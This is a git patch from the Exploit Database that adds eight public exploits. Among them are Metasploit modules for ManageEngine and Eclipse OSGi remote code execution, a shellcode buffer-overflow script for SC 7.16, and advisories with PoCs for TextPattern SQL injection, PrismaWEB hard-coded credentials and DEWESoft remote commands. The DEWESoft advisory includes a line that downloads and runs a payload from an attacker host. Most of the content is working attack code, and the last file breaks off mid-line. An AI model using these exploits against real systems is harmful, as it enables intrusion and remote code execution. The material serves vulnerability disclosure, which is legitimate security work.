From 3f6d16d5c317673eb92c7c41b9253d4e5001fa8a Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 13 Mar 2018 05:01:46 +0000 Subject: [PATCH] DB: 2018-03-13 8 changes to exploits/shellcodes Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Loader Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Kernel Loader SC 7.16 - Stack-Based Buffer Overflow DEWESoft X3 SP1 (64-bit) - Remote Command Execution Eclipse Equinoxe OSGi Console - Command Execution (Metasploit) ManageEngine Applications Manager 13.5 - Remote Code Execution (Metasploit) Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded Credentials TextPattern 4.6.2 - 'qty' SQL Injection Advantech WebAccess < 8.3 - Directory Traversal / Remote Code Execution ACL Analytics 11.X - 13.0.0.579 - Arbitrary Code Execution --- exploits/java/webapps/44274.rb | 117 +++++++++++++++++++++++++++ exploits/linux/local/44279.py | 78 ++++++++++++++++++ exploits/multiple/remote/44280.rb | 118 ++++++++++++++++++++++++++++ exploits/multiple/webapps/44276.txt | 36 +++++++++ exploits/php/webapps/44277.txt | 87 ++++++++++++++++++++ exploits/windows/remote/44275.txt | 100 +++++++++++++++++++++++ exploits/windows/webapps/44278.py | 74 +++++++++++++++++ exploits/windows/webapps/44281.txt | 90 +++++++++++++++++++++ files_exploits.csv | 10 ++- 9 files changed, 709 insertions(+), 1 deletion(-) create mode 100755 exploits/java/webapps/44274.rb create mode 100755 exploits/linux/local/44279.py create mode 100755 exploits/multiple/remote/44280.rb create mode 100644 exploits/multiple/webapps/44276.txt create mode 100644 exploits/php/webapps/44277.txt create mode 100644 exploits/windows/remote/44275.txt create mode 100755 exploits/windows/webapps/44278.py create mode 100644 exploits/windows/webapps/44281.txt diff --git a/exploits/java/webapps/44274.rb b/exploits/java/webapps/44274.rb new file mode 100755 index 000000000..60d809122 --- /dev/null +++ b/exploits/java/webapps/44274.rb @@ -0,0 +1,117 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Powershell + + def initialize(info={}) + super(update_info(info, + 'Name' => "ManageEngine Applications Manager Remote Code Execution", + 'Description' => %q{ + This module exploits command injection vulnerability in the ManageEngine Application Manager product. + An unauthenticated user can execute a operating system command under the context of privileged user. + + Publicly accessible testCredential.do endpoint takes multiple user inputs and validates supplied credentials + by accessing given system. This endpoint calls a several internal classes and then executes powershell script + without validating user supplied parameter when the given system is OfficeSharePointServer. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Mehmet Ince ' # author & msf module + ], + 'References' => + [ + ['CVE', '2018-7890'], + ['URL', 'https://pentest.blog/advisory-manageengine-applications-manager-remote-code-execution-sqli-and/'] + ], + 'DefaultOptions' => + { + 'WfsDelay' => 10, + 'RPORT' => 9090 + }, + 'Payload' => + { + 'BadChars' => "\x22" + }, + 'Platform' => ['win'], + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'Targets' => [ ['Automatic', {}] ], + 'Privileged' => true, + 'DisclosureDate' => 'Mar 7 2018', + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The URI of the application', '/']) + ] + ) + end + + def check + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'testCredential.do'), + 'vars_post' => { + 'method' => 'testCredentialForConfMonitors', + 'type' => 'OfficeSharePointServer', + 'montype' => 'OfficeSharePointServer', + 'isAgentEnabled' => 'NO', + 'isAgentAssociated' => 'false', + 'displayname' => Rex::Text.rand_text_alpha(10), + 'HostName' => '127.0.0.1', # Try to access random IP address or domain may trigger SIEMs or DLP systems... + 'Version' => '2013', + 'Powershell' => 'True', # :-) + 'CredSSP' => 'False', + 'SPType' => 'SPServer', + 'CredentialDetails' => 'nocm', + 'Password' => Rex::Text.rand_text_alpha(3), + 'UserName' => Rex::Text.rand_text_alpha(3) + } + }) + if res && res.body.include?('Kindly check the credentials and try again') + Exploit::CheckCode::Vulnerable + else + Exploit::CheckCode::Safe + end + end + + def exploit + + powershell_options = { + encode_final_payload: true, + remove_comspec: true + } + p = cmd_psh_payload(payload.encoded, payload_instance.arch.first, powershell_options) + + print_status('Triggering the vulnerability') + + send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'testCredential.do'), + 'vars_post' => { + 'method' => 'testCredentialForConfMonitors', + 'type' => 'OfficeSharePointServer', + 'montype' => 'OfficeSharePointServer', + 'isAgentEnabled' => 'NO', + 'isAgentAssociated' => 'false', + 'displayname' => Rex::Text.rand_text_alpha(10), + 'HostName' => '127.0.0.1', # Try to access random IP address or domain may trigger SIEMs or DLP systems... + 'Version' => '2013', + 'Powershell' => 'True', # :-) + 'CredSSP' => 'False', + 'SPType' => 'SPServer', + 'CredentialDetails' => 'nocm', + 'Password' => Rex::Text.rand_text_alpha(3), + 'UserName' => "$(#{p})" + } + }) + + end +end \ No newline at end of file diff --git a/exploits/linux/local/44279.py b/exploits/linux/local/44279.py new file mode 100755 index 000000000..d97d8c327 --- /dev/null +++ b/exploits/linux/local/44279.py @@ -0,0 +1,78 @@ +# Exploit Author: Juan Sacco - http://www.exploitpack.com +# Bug found using Exploit Pack - Local fuzzer feature. +# +# Tested on: GNU/Linux - Kali Linux +# Filename: pool/main/s/sc/sc_7.16-4+b2_i386.deb +# +# Description: SC v7.16 is prone to a basic stack-based buffer overflow +# vulnerability because the application fails to perform adequate +# boundary-checks on user-supplied input. +# +# An attacker could exploit this issue to execute arbitrary code in the +# context of the application. Failed exploit attempts will result in a +# denial-of-service condition. +# +# Vendor homepage: SC v7.16 - +http://www.ibiblio.org/pub/Linux/apps/financial/spreadsheet/!INDEX.html +# +# +#[----------------------------------registers-----------------------------------] +#EAX: 0x0 +#EBX: 0x41414141 ('AAAA') +#ECX: 0x42 ('B') +#EDX: 0x1 +#ESI: 0x41414141 ('AAAA') +#EDI: 0x41414141 ('AAAA') +#EBP: 0x41414141 ('AAAA') +#ESP: 0xbfffee30 --> 0xbffff100 --> 0xb7fd9000 (jg 0xb7fd9047) +#EIP: 0x41424344 ('DCBA') +#EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT +direction overflow) +#[-------------------------------------code-------------------------------------] +#Invalid $PC address: 0x41424344 +#[------------------------------------stack-------------------------------------] +#0000| 0xbfffee30 --> 0xbffff100 --> 0xb7fd9000 (jg 0xb7fd9047) +#0004| 0xbfffee34 --> 0x1 +#0008| 0xbfffee38 --> 0x0 +#0012| 0xbfffee3c --> 0x0 +#0016| 0xbfffee40 --> 0xf63d4e2e +#0020| 0xbfffee44 --> 0xb7fe4bf9 (: add esp,0x20) +#0024| 0xbfffee48 --> 0x1 +#0028| 0xbfffee4c --> 0x1 +#[------------------------------------------------------------------------------] +#Legend: code, data, rodata, value +#Stopped reason: SIGSEGV +#0x41424344 in ?? () +#gdb-peda$ backtrace +##0 0x41424344 in ?? () +##1 0xbffff100 in ?? () +#Backtrace stopped: previous frame inner to this frame (corrupt stack?) +#gdb-peda$ +# +#==2332== +#==2332== Jump to the invalid address stated on the next line +#==2332== at 0x41424344: ??? +#==2332== Address 0x41424344 is not stack'd, malloc'd or (recently) free'd +#==2332== +#==2332== +#==2332== Process terminating with default action of signal 11 (SIGSEGV) +#==2332== Access not within mapped region at address 0x41424344 +#==2332== at 0x41424344: ??? +import subprocess +import os + +buffersize = 1052 +nopsled = "\x90" +# Shell +shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" +eip = "\x10\xf0\xff\xbf" +buffer = nopsled * (buffersize-len(shellcode)) + eip + +try: + subprocess.call(["/usr/bin/sc", buffer]) +except OSError as e: + if e.errno == os.errno.ENOENT: + print "SC binary not found!" + else: + print "Error executing exploit" + raise \ No newline at end of file diff --git a/exploits/multiple/remote/44280.rb b/exploits/multiple/remote/44280.rb new file mode 100755 index 000000000..77273245c --- /dev/null +++ b/exploits/multiple/remote/44280.rb @@ -0,0 +1,118 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## +require 'base64' + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::CmdStager + include Msf::Exploit::Powershell + + TELNET_IAC = Msf::Exploit::Remote::Telnet + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Eclipse Equinoxe OSGi Console Command Execution', + 'Description' => %q{ + Exploit Eclipse Equinoxe OSGi (Open Service Gateway initiative) console + 'fork' command to execute arbitrary commands on the remote system.. + }, + 'Author' => + [ + 'Quentin Kaiser ' + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['URL', 'https://www.eclipse.org/equinox/documents/quickstart-framework.php'] + ], + 'Platform' => %w{ linux win }, + 'Arch' => [ARCH_ARMLE, ARCH_AARCH64, ARCH_X86, ARCH_X64], + 'Targets'=> [ + [ 'Linux (Bash Payload)', { 'Platform' => 'linux' } ], + [ 'Windows (Powershell Payload)', { 'Platform' => 'win' } ] + ], + 'CmdStagerFlavor' => [ 'bourne' ], + 'DisclosureDate' => 'Feb 13 2018', + 'DefaultTarget' => 0)) + deregister_options('SRVHOST', 'SRVPORT', 'SSL', 'SSLCert', 'URIPATH') + register_options([ + OptInt.new('TIME_WAIT', [ true, 'Time to wait for payload to be executed', 20]) + ]) + end + + def check + connect + res = sock.get_once + if res == TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_ECHO+\ + TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_SGA+\ + TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_NAWS+\ + TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_TTYPE + # terminal type 'xterm-256color' = \x78\x74\x65\x72\x6D\x2D\x32\x35\x36\x63\x6F\x6C\x6F\x72 + sock.put(TELNET_IAC::IAC+TELNET_IAC::SB+TELNET_IAC::OPT_TTYPE+\ + "\x00xterm-256color"+TELNET_IAC::IAC+TELNET_IAC::SE) + res = sock.get_once + end + disconnect + if res && res == "osgi> " + return Exploit::CheckCode::Vulnerable + end + Exploit::CheckCode::Safe + end + + def exploit + begin + print_status("Accessing the OSGi console ...") + + unless check == Exploit::CheckCode::Vulnerable + fail_with(Failure::NoTarget, "#{peer} - Failed to access the OSGi console") + end + + if target['Platform'] == "win" then + exec_command("fork \"#{cmd_psh_payload(payload.encoded, payload_instance.arch.first, {encode_final_payload: true, remove_comspec: true})}\"") + else + execute_cmdstager({:flavor => :bourne}) + end + + print_status("#{rhost}:#{rport} - Waiting for session...") + + (datastore['TIME_WAIT']).times do + Rex.sleep(1) + # Success! session is here! + break if session_created? + end + rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e + fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{e.message}") + ensure + disconnect + end + end + + def exec_command(cmd) + connect + res = sock.get_once + if res == TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_ECHO+\ + TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_SGA+\ + TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_NAWS+\ + TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_TTYPE + sock.put(TELNET_IAC::IAC+TELNET_IAC::SB+TELNET_IAC::OPT_TTYPE+\ + "\x00xterm-256color"+TELNET_IAC::IAC+TELNET_IAC::SE) + res = sock.get_once + end + print_status("Exploiting...") + sock.put("#{cmd}\r\n") + res = sock.get + sock.put("disconnect\r\n") + res = sock.get + sock.put("y\r\n") + end + + def execute_command(cmd, opts={}) + cmd_b64 = Base64.encode64(cmd).gsub(/\s+/, "") + # Runtime.getRuntime().exec() workaround on Linux. Requires bash. + exec_command("fork \"bash -c {echo,#{cmd_b64}}|{base64,-d}|{bash,-i}\"") + end +end \ No newline at end of file diff --git a/exploits/multiple/webapps/44276.txt b/exploits/multiple/webapps/44276.txt new file mode 100644 index 000000000..56f383178 --- /dev/null +++ b/exploits/multiple/webapps/44276.txt @@ -0,0 +1,36 @@ +Prisma Industriale Checkweigher PrismaWEB 1.21 Authentication Bypass + + +Vendor: Prisma Industriale S.r.l. +Product web page: https://www.prismaindustriale.com +Affected version: 1.0 (Rev 21, EPROM 202FWSAM ??) + +Summary: Web Administration of Machine. + +Desc: The vulnerability exists due to the disclosure of hard-coded credentials allowing +an attacker to effectively bypass authentication of PrismaWEB with administrator +privileges. The credentials can be disclosed by simply navigating to the login_par.js +JavaScript page that holds the username and password for the management interface that +are being used via the Login() function in /scripts/functions_cookie.js script. + +Tested on: HMS AnyBus-S WebServer + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2018-5453 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php + +06.02.2018 + +--- + + +$ curl http://10.10.10.70/user/scripts/login_par.js +// JavaScript Document +// 11 Dicembre 2009 Release 1.0 Rev.10 + +var txtChkUser = "prismaweb"; // Nome utente Login +var txtChkPassword = "prisma"; // Password Login \ No newline at end of file diff --git a/exploits/php/webapps/44277.txt b/exploits/php/webapps/44277.txt new file mode 100644 index 000000000..1e30617ef --- /dev/null +++ b/exploits/php/webapps/44277.txt @@ -0,0 +1,87 @@ +============================================= +MGC ALERT 2018-002 +- Original release date: February 12, 2018 +- Last revised: March 12, 2018 +- Discovered by: Manuel García Cárdenas +- Severity: 7,1/10 (CVSS Base Score) +- CVE-ID: CVE-2018-7474 +============================================= + +I. VULNERABILITY +------------------------- +SQL Injection in Textpattern <= 4.6.2 + +II. BACKGROUND +------------------------- +Textpattern is a free and open-source content management system (CMS) based +on PHP and MySQL, originally developed by Dean Allen and now developed by +Team Textpattern. + +III. DESCRIPTION +------------------------- +This bug was found using the portal with authentication as administrator. + +To exploit the vulnerability only is needed use the version 1.0 of the HTTP +protocol to interact with the application. + +It is possible to inject SQL code in the variable "qty" on the page +"index.php". + +IV. PROOF OF CONCEPT +------------------------- +The following URL's and parameters have been confirmed to all suffer from +SQL injection. + +/textpattern/textpattern/index.php?event=link&step=link_change_pageby&qty=50&_txp_token=baa07ba857d3618ef810b725b9d4d9d8 + +Note: the variable "_txp_token" doest not work as a anti-csrf. + +POC: + +/textpattern/textpattern/index.php?event=link&step=link_change_pageby&qty=50%20into%20outfile%20'% +5cfakesite.com%5c'%3b%20--%20&_txp_token=baa07ba857d3618ef810b725b9d4d9d8 + +V. BUSINESS IMPACT +------------------------- +Public defacement, confidential data leakage, and database server +compromise can result from these attacks. Client systems can also be +targeted, and complete compromise of these client systems is also possible. + +VI. SYSTEMS AFFECTED +------------------------- +Textpattern <= 4.6.2 + +VII. SOLUTION +------------------------- +Disable website until a fix is available. + +VIII. REFERENCES +------------------------- +https://textpattern.com/ + +IX. CREDITS +------------------------- +This vulnerability has been discovered and reported +by Manuel García Cárdenas (advidsec (at) gmail (dot) com). + +X. REVISION HISTORY +------------------------- +February 12, 2018 1: Initial release +March 12, 2018 2: Revision to send to lists + +XI. DISCLOSURE TIMELINE +------------------------- +February 12, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas +February 12, 2018 2: Send to vendor without response +February 26, 2018 3: Second email to vendor without response +March 12, 2018 4: Send to the Full-Disclosure lists + +XII. LEGAL NOTICES +------------------------- +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. + +XIII. ABOUT +------------------------- +Manuel Garcia Cardenas +Pentester \ No newline at end of file diff --git a/exploits/windows/remote/44275.txt b/exploits/windows/remote/44275.txt new file mode 100644 index 000000000..bfd389f91 --- /dev/null +++ b/exploits/windows/remote/44275.txt @@ -0,0 +1,100 @@ +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/DEWESOFT-X3-REMOTE-INTERNAL-COMMAND-ACCESS.txt +[+] ISR: Apparition Security + + + +Vendor: +============= +www.dewesoft.com + + +Product: +=========== +DEWESoft X3 SP1 (64-bit) installer - X3 +DEWESoft_FULL_X3_SP1_64BIT.exe + + + +Vulnerability Type: +=================== +Remote Internal Command Access + + + +CVE Reference: +============== +CVE-2018-7756 + + + +Security Issue: +================ +The installer for DEWESoft X3 SP1 (64-bit) devices, specifically the "RunExeFile.exe" component does not require authentication +for sessions on TCP port 1999, which allows remote attackers to execute arbitrary code or access internal commands, as demonstrated by a +RUN command that can launch an .EXE file located at an arbitrary directory location, download an .EXE from an external URL, or Run +a "SETFIREWALL Off" command. + +The RunExeFile.exe "Launcher" is located at "C:\Program Files (x86)\Common Files\DEWESoft Shared\" after installing using the full-install. + +Internal commands used by "RunExeFile.exe" for which I could not find any documentation. + +RUN +RUNEX +GETFIREWALL +SETFIREWALL Off +KILL +USERNAME +SHUTDOWN +SENDKEYS +LIST +DWPIPE + +Exploit/POC: +============= +TELNET x.x.x.x 1999 +RUN calc.exe + +OR + +Launch the victims browser and send them to website for a drive-by download etc. + +TELNET x.x.x.x 1999 +RUN http://ATTACKER-IP/DOOM.exe + +Then from the TELNET session execute it from Downloads directory. + +runexe c:\Users\victim\Downloads\DOOM.exe + + +Network Access: +=============== +Remote + + + +Severity: +========= +High + + + +Disclosure Timeline: +============================= +Vendor Notification: February 9, 2018 +Vendor "thank you for the warning. We will forward this to the developers and they will look into it" : February 19, 2018 +Inform vendor of disclosure timeline : February 19, 2018 +No further replys, update or addressing of the issue by vendor. +Vendor "We will assume that this issue is resolved and close the ticket." : March 6, 2018 +March 10, 2018 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). \ No newline at end of file diff --git a/exploits/windows/webapps/44278.py b/exploits/windows/webapps/44278.py new file mode 100755 index 000000000..4ee3914c7 --- /dev/null +++ b/exploits/windows/webapps/44278.py @@ -0,0 +1,74 @@ +#!/usr/bin/python2.7 + +# Exploit Title: Advantech WebAccess < 8.3 webvrpcs Directory Traversal RCE Vulnerability +# Date: 03-11-2018 +# Exploit Author: Chris Lyne (@lynerc) +# Vendor Homepage: www.advantech.com +# Software Link: http://advcloudfiles.advantech.com/web/Download/webaccess/8.2/AdvantechWebAccessUSANode8.2_20170817.exe +# Version: Advantech WebAccess 8.2-2017.08.18 +# Tested on: Windows Server 2008 R2 Enterprise 64-bit +# CVE : CVE-2017-16720 +# See Also: https://www.zerodayinitiative.com/advisories/ZDI-18-024/ + +import sys, struct +from impacket import uuid +from impacket.dcerpc.v5 import transport + +def call(dce, opcode, stubdata): + dce.call(opcode, stubdata) + res = -1 + try: + res = dce.recv() + except Exception, e: + print "Exception encountered..." + str(e) + sys.exit(1) + return res + +if len(sys.argv) != 2: + print "Provide only host arg" + sys.exit(1) + +port = 4592 +interface = "5d2b62aa-ee0a-4a95-91ae-b064fdb471fc" +version = "1.0" + +host = sys.argv[1] + +string_binding = "ncacn_ip_tcp:%s" % host +trans = transport.DCERPCTransportFactory(string_binding) +trans.set_dport(port) + +dce = trans.get_dce_rpc() +dce.connect() + +print "Binding..." +iid = uuid.uuidtup_to_bin((interface, version)) +dce.bind(iid) + +print "...1" +stubdata = struct.pack("